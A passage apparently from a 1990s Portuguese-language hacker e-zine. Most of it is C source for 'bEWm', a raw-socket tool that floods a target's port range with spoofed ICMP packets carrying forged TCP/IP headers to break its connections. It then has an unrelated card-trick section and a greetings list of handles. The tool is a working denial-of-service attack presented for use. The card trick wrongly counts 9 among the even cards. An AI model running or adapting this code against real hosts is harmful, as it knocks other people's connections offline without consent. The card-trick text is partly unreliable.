#define offsetICMP (sizeof(struct iphdr))
#define offsetRIP (0)
static int thecode;
int s = 0;
u_short cksum( u_short *, int );
void sendkill( char *, int, char *, int );
u_short cksum( u_short *buf, int nwords ) {
unsigned long sum;
for ( sum = 0; nwords > 0; nwords -- )
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void resolve_address(struct sockaddr * addr, char *hostname, u_short port) {
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
address->sin_family = AF_INET;
address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1) {
host = gethostbyname(hostname);
if (host) {
bcopy( host->h_addr, (char *)&address->sin_addr,
host->h_length);
}
else {
puts("Couldn't resolve address!!!");
exit(-1);
}}}
void sendkill( char * fromhost, int fromport, char * tohost, int toport ) {
char *packet;
static struct sockaddr_in local, remote;
static int sock = 0;
if ( !sock ) {
resolve_address( (struct sockaddr *)&local, fromhost, fromport );
resolve_address( (struct sockaddr *)&remote, tohost, toport );
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if ( sock == -1 ) {
perror("Getting raw socket");
exit(-1);
}}
packet = (char *)malloc( PACKETSIZE );
if ( !packet ) {
perror("Getting space for packet");
exit(-1);
}
{
struct tcphdr * fake_tcp;
fake_tcp = ( struct tcphdr *)( packet + offsetTCP );
fake_tcp->th_dport = htons(fromport);
fake_tcp->th_sport = htons(toport);
fake_tcp->th_seq = 0x1984;
}
{
struct iphdr * fake_ip;
fake_ip = ( struct iphdr *) ( packet + offsetIP );
fake_ip->version = 4;
fake_ip->tot_len = htons(0x2C);
fake_ip->tos = 0;
fake_ip->id = htons( getpid() & 255 );
fake_ip->frag_off = 0;
fake_ip->ttl = 1;
fake_ip->check = 31337;
fake_ip->ihl = 5;
bcopy( (char *)&local.sin_addr, &fake_ip->daddr, sizeof( fake_ip->daddr ) );
bcopy( (char *)&remote.sin_addr,&fake_ip->saddr, sizeof( fake_ip->saddr ) );
fake_ip->protocol = 6;
}
{
struct icmphdr * icmp;
icmp = ( struct icmphdr *)(packet + offsetICMP );
icmp->type = 4;
icmp->code = thecode;
icmp->un.gateway = 0;
icmp->checksum = 0;
icmp->checksum = cksum( (u_short *)(icmp), ICMPSIZE >> 1 );
}
{
struct iphdr * real_ip;
real_ip = ( struct iphdr *)packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons(PACKETSIZE);
real_ip->tos = ( 7 << 5) | 4;
real_ip->ttl = 255;
real_ip->protocol = 1;
real_ip->check = 0;
real_ip->id = htons( 3 );
real_ip->frag_off = 0;
bcopy( (char *)&local.sin_addr, &real_ip->saddr, sizeof( real_ip->saddr ) );
bcopy( (char *)&remote.sin_addr,&real_ip->daddr, sizeof( real_ip->daddr ) );
real_ip->saddr = htonl( ntohl(real_ip->daddr ) & 0xffffff00L );
real_ip->check = cksum( (u_short *)packet, sizeof( struct iphdr ) >> 1 );
}
{
int result;
result = sendto( sock, packet, PACKETSIZE, 0, (struct sockaddr *)&remote, sizeof( remote ) );
if ( result != PACKETSIZE ) {
perror("sending packet" );
}}}
void finish() {
(void)signal(SIGINT, SIG_IGN);
(void)putchar('\n');
(void)printf("--- bEWm sTATISTICs ---\n");
(void)printf("pACKETs sENt: %d \n", s);
(void)putchar('\n'); exit(0); }
main(int argc, char ** argv) {
int codes,i;
puts("===========================================");
puts("bEWm");
puts("Written by Rza");
puts("vEr 1.0");
puts("Tue Jun 11 06:54:07 EDT 1996");
puts("===========================================");
if (argc != 7) {
puts("SYNTAX: <srcaddress> <srcport> <destaddress> <destportlow> <destporthigh> <icmp>");
exit(-1);
}
thecode = atoi(argv[6]);
sendloop:
for( i = atoi(argv[4]) ; i <= atoi(argv[5]) ; i++) {
s++;
printf("%d bytes from %s : %d to %s : %d ",PACKETSIZE+ICMPSIZE,argv[1],atoi(argv[2]),argv[3],i);
sendkill(argv[1], atoi(argv[2]), argv[3], i);
usleep(300000);
(void)signal(SIGINT, finish);
}
goto sendloop;
}
-----------------------------------------------------------------------------
10.°°°BoNuS!!!
Truques com cartas
Bah!! Eu sei que isso nao tem nada a ver.. Acontece que os unicos emails que eu recebi, foram os dos atuais editores e novos editores, por isso nao tinha o que colocar na secao de emails.
Na secao de BoNuS eu tb nao tinha nada novo pa' colocar e nao queria colocar novamente a lista Top10 hacking..
Por isso, me lembrei de uns truques com cartas que me ensinaram jah faiz um tempo e gostaria de passar adiante, jah que estamos ai pra divulgar informacao mesmo.
##### Truque 1 #####
##### Adivinhando a Carta #####
Separe um baralho de 52 cartas(tire os 2 coringas), em pares e impares. Sendo que os pares sao: 2, 4, 6, 8, 9, 10 e 12(dama). E os impares sao: 1(As), 3, 5, 7, 9, 11(valete), 13(rei).
Separeas em dois bolinhos. Vire um bolinho(qquer um) de costas para a mesa e o outro de costas para voce.
Embaralhe-os desse mesmo modo em que se encontram. Pares de um lado e impares do outro.
Peça para que alguem escolha uma carta que esteja de costas para vc, para que vc nao saiba qual e'.
Em quanto ele olha a carta, vire o bolo de cartas que esta em sua mao e peça para que ele coloque a carta do geito que a tirou em qquer parte do baralho.
Feche o bolo novamente e embaralhe-o se a pessoa quizer assim..
Agora va passando as cartas e olhando-as. A que nao for da sequencia sera' a que ele escolheu. Vc: "Hã????". Assim..
2, 6, 4, 12, 6, 3...
O 3 e' a carta escolhida, pois e' a carta impar no lado das cartas pares. Se for ao contrario..
3, 9, 5, 1, 1, 7, 8...
O 8 sera' a carta escolhida.
¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯ÿ¯
Vou deixar os outros truques para outras edicoes que nao tenham mails para publicar.
Como sempre, gostaria de mandar um abraço para:
[LuCiFeR] ==> o filho do Diabo
|zERo|
spectro
JimiHendrx
kbyte
ZeFuReNgA
AcidBrain
almeida
[SerrialKiller]
DeMoN
Gabriel Dov
Shotgun
Whist